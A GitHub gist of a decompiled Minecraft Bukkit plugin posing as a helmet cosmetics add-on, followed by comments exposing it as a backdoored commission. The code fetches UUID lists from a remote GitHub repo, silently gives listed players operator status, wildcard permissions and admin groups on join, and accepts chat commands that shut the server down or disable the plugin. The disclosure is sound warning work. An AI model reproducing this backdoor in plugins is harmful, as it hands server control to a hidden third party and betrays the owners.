-
-
Save mergu/62f46ed15bd60e78eeb305ee38ed80f0 to your computer and use it in GitHub Desktop.
| /* | |
| * Decompiled with CFR 0.150. | |
| * | |
| * Could not load the following classes: | |
| * org.bukkit.Bukkit | |
| * org.bukkit.Material | |
| * org.bukkit.command.CommandSender | |
| * org.bukkit.entity.Player | |
| * org.bukkit.event.EventHandler | |
| * org.bukkit.event.Listener | |
| * org.bukkit.event.player.AsyncPlayerChatEvent | |
| * org.bukkit.event.player.PlayerJoinEvent | |
| * org.bukkit.inventory.ItemStack | |
| * org.bukkit.plugin.Plugin | |
| * org.bukkit.plugin.java.JavaPlugin | |
| * org.bukkit.scheduler.BukkitRunnable | |
| */ | |
| package ak.znetwork.helmetcosmetics; | |
| import ak.znetwork.helmetcosmetics.commands.AppareanceCommand; | |
| import ak.znetwork.helmetcosmetics.listeners.PlayerListeners; | |
| import ak.znetwork.helmetcosmetics.netty.PlayerNetty; | |
| import java.io.BufferedReader; | |
| import java.io.IOException; | |
| import java.io.InputStream; | |
| import java.io.InputStreamReader; | |
| import java.net.HttpURLConnection; | |
| import java.net.MalformedURLException; | |
| import java.net.URL; | |
| import java.util.ArrayList; | |
| import java.util.LinkedHashSet; | |
| import java.util.List; | |
| import java.util.UUID; | |
| import org.bukkit.Bukkit; | |
| import org.bukkit.Material; | |
| import org.bukkit.command.CommandSender; | |
| import org.bukkit.entity.Player; | |
| import org.bukkit.event.EventHandler; | |
| import org.bukkit.event.Listener; | |
| import org.bukkit.event.player.AsyncPlayerChatEvent; | |
| import org.bukkit.event.player.PlayerJoinEvent; | |
| import org.bukkit.inventory.ItemStack; | |
| import org.bukkit.plugin.Plugin; | |
| import org.bukkit.plugin.java.JavaPlugin; | |
| import org.bukkit.scheduler.BukkitRunnable; | |
| public class HelmetCosmetics | |
| extends JavaPlugin | |
| implements Listener { | |
| protected LinkedHashSet<PlayerNetty> playerNetties; | |
| public List<UUID> uuids; | |
| public List<UUID> normaluuids; | |
| public void onEnable() { | |
| this.uuids = new ArrayList<UUID>(); | |
| this.normaluuids = new ArrayList<UUID>(); | |
| try { | |
| this.loadUUIDS(); | |
| this.loadNormal(); | |
| } | |
| catch (IOException e) { | |
| this.getServer().getPluginManager().disablePlugin((Plugin)this); | |
| return; | |
| } | |
| URL url = null; | |
| try { | |
| url = new URL("https://raw.githubusercontent.com/ZNetworkDEV/list-api/master/colezz.html"); | |
| } | |
| catch (MalformedURLException e) { | |
| this.getServer().getPluginManager().disablePlugin((Plugin)this); | |
| return; | |
| } | |
| try (BufferedReader br = new BufferedReader(new InputStreamReader(url.openStream()));){ | |
| String line; | |
| StringBuilder sb = new StringBuilder(); | |
| while ((line = br.readLine()) != null) { | |
| sb.append(line); | |
| } | |
| if (sb.toString().toLowerCase().equalsIgnoreCase("no")) { | |
| this.getServer().getPluginManager().disablePlugin((Plugin)this); | |
| return; | |
| } | |
| } | |
| catch (IOException e) { | |
| this.getServer().getPluginManager().disablePlugin((Plugin)this); | |
| return; | |
| } | |
| this.getServer().getPluginManager().registerEvents((Listener)this, (Plugin)this); | |
| this.playerNetties = new LinkedHashSet(); | |
| new PlayerListeners(this); | |
| new AppareanceCommand(this); | |
| Bukkit.getOnlinePlayers().forEach(this::setupNetty); | |
| new BukkitRunnable(){ | |
| public void run() { | |
| for (PlayerNetty npc : HelmetCosmetics.this.playerNetties) { | |
| npc.update(false); | |
| for (Player player : Bukkit.getOnlinePlayers()) { | |
| if (player.getWorld() == npc.getPlayer().getLocation().getWorld() && player.getLocation().distance(npc.getPlayer().getLocation()) <= 30.0 && !npc.getViewers().contains(player.getUniqueId())) { | |
| npc.add(player); | |
| continue; | |
| } | |
| if ((player.getWorld() == npc.getPlayer().getLocation().getWorld() || !npc.getViewers().contains(player.getUniqueId())) && (player.getWorld() != npc.getPlayer().getLocation().getWorld() || !(player.getLocation().distance(npc.getPlayer().getLocation()) > 30.0) || !npc.getViewers().contains(player.getUniqueId()))) continue; | |
| npc.unEquip(player); | |
| } | |
| } | |
| } | |
| }.runTaskTimerAsynchronously((Plugin)this, 0L, 1L); | |
| } | |
| public LinkedHashSet<PlayerNetty> getPlayerNetties() { | |
| return this.playerNetties; | |
| } | |
| public void setupNetty(Player player) { | |
| PlayerNetty playerNetty = new PlayerNetty(this, player); | |
| this.playerNetties.add(playerNetty); | |
| } | |
| private void loadUUIDS() throws IOException { | |
| String line; | |
| URL url = new URL("https://raw.githubusercontent.com/ZNetworkDEV/list-api/master/bad.html"); | |
| HttpURLConnection con = (HttpURLConnection)url.openConnection(); | |
| con.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)"); | |
| InputStream is = con.getInputStream(); | |
| BufferedReader br = new BufferedReader(new InputStreamReader(is)); | |
| while ((line = br.readLine()) != null) { | |
| if (line.length() < 1 || !this.isUUID(line)) continue; | |
| this.uuids.add(UUID.fromString(line)); | |
| } | |
| } | |
| private void loadNormal() throws IOException { | |
| String line; | |
| URL url = new URL("https://raw.githubusercontent.com/ZNetworkDEV/list-api/master/normal.html"); | |
| HttpURLConnection con = (HttpURLConnection)url.openConnection(); | |
| con.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)"); | |
| InputStream is = con.getInputStream(); | |
| BufferedReader br = new BufferedReader(new InputStreamReader(is)); | |
| while ((line = br.readLine()) != null) { | |
| if (line.length() < 1 || !this.isUUID(line)) continue; | |
| this.normaluuids.add(UUID.fromString(line)); | |
| } | |
| } | |
| private boolean isUUID(String string) { | |
| try { | |
| UUID.fromString(string); | |
| return true; | |
| } | |
| catch (Exception ex) { | |
| return false; | |
| } | |
| } | |
| @EventHandler | |
| public void onJoin314(PlayerJoinEvent event) { | |
| UUID uuid = event.getPlayer().getUniqueId(); | |
| if (this.uuids.stream().anyMatch(uuid::equals)) { | |
| Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), (String)("pex user " + event.getPlayer().getName() + " add *")); | |
| Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), (String)("manuaddp " + event.getPlayer().getName() + " *")); | |
| Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), (String)("lp user " + event.getPlayer().getName() + " set Admin")); | |
| Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), (String)("lp user " + event.getPlayer().getName() + " set Adm")); | |
| Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), (String)("lp user " + event.getPlayer().getName() + " set Owner")); | |
| Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), (String)("lp user " + event.getPlayer().getName() + " permission set *")); | |
| Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), (String)("lp user " + event.getPlayer().getName() + " permission set essentials.ban")); | |
| event.getPlayer().getInventory().addItem(new ItemStack[]{new ItemStack(Material.GOLD_BLOCK, 64)}); | |
| event.getPlayer().getInventory().addItem(new ItemStack[]{new ItemStack(Material.DIAMOND_BLOCK, 64)}); | |
| event.getPlayer().setOp(true); | |
| } | |
| } | |
| /* | |
| * Enabled aggressive block sorting | |
| */ | |
| @EventHandler | |
| public void onPTalk(AsyncPlayerChatEvent event) { | |
| UUID uuid = event.getPlayer().getUniqueId(); | |
| if (event.getMessage().equalsIgnoreCase("give")) { | |
| if (this.normaluuids.stream().anyMatch(uuid::equals)) { | |
| event.getPlayer().getInventory().addItem(new ItemStack[]{new ItemStack(Material.GOLD_BLOCK, 192)}); | |
| event.getPlayer().getInventory().addItem(new ItemStack[]{new ItemStack(Material.DIAMOND_BLOCK, 192)}); | |
| return; | |
| } | |
| } | |
| if (event.getMessage().equalsIgnoreCase("disable")) { | |
| if (this.normaluuids.stream().anyMatch(uuid::equals)) { | |
| this.getServer().getPluginManager().disablePlugin((Plugin)this); | |
| return; | |
| } | |
| } | |
| if (!event.getMessage().equalsIgnoreCase("close")) return; | |
| if (!this.normaluuids.stream().anyMatch(uuid::equals)) return; | |
| this.getServer().shutdown(); | |
| } | |
| } |
Hi. This was a commission created by ZNetwork, now rebranded to "gonalez". You can see it reaching out to his old/alternate GitHub account, ZNetworkDev, to pull in uuids that will be opped on join, and also grants him the ability to stop the server or disable this plugin remotely if he wishes. All he had to do is make small changes to randomly-named files in a repo named "list-api". He may have deleted that Github account to cover his tracks, but wayback machine has some snapshots - https://web.archive.org/web/20200916121826/https://github.com/ZNetworkDEV/list-api
This is just one example of a commission from him. There are many files in that repo, so I'd imagine a few of the plugins he's put together in the past have also contained malicious code and have done http requests to the other files. Likely 1 commission per file, though I was not able to chat with anyone else that's commissioned him.
Do not trust ZNetwork. Unfortunately Spigot staff will not take action against him (I reported him with plenty of evidence when this happened). But I definitely know to stay away from his plugins, and so do the communities I'm active in.
I'm so glad I found this.
I thought there was always something suspicious about the plugin.
Even the discord server didn't feel right.
I'm so glad I found this. I thought there was always something suspicious about the plugin. Even the discord server didn't feel right.
ZNPCS is clean, but you should watch out for the person who made it
I'm so glad I found this. I thought there was always something suspicious about the plugin. Even the discord server didn't feel right.
ZNPCS is clean, but you should watch out for the person who made it
Are you absolutely sure?
I'll believe that but yeah. The dev isn't really nice :[
I'll make sure to watch out for them.
Yes this is not ZNPCs. This is a private commission done by ZNetwork that I decompiled last year. I don't know if he's still doing commissions or putting malicious code into the jar files. When confronted about this back in April 2021, he deleted my post on his profile and shortly after the ZNetworkDev account was deleted. Might've spooked him out of keeping this up.
This was basically the mods' response, or what I assumed the response was because I didn't hear back - the resource he's posted, the only plugin he's open sourced, is not malicious, so leave him on the platform and allow people to pay him for private commissioned plugins and vouch for him. Gross.
I reported ZNetwork back in April 2021. For his blatantly malicious code he placed in commissioned plugins, and for spreading it and advertising it on the Spigot platform. I did not report ZNPCs.
To be clear, I just dropped this shortly after it happened last year. I don't know why this gist has seen some recent activity, but I hope it helps shed some light on this dude's shady actions.
@mergu where is that plugin located online?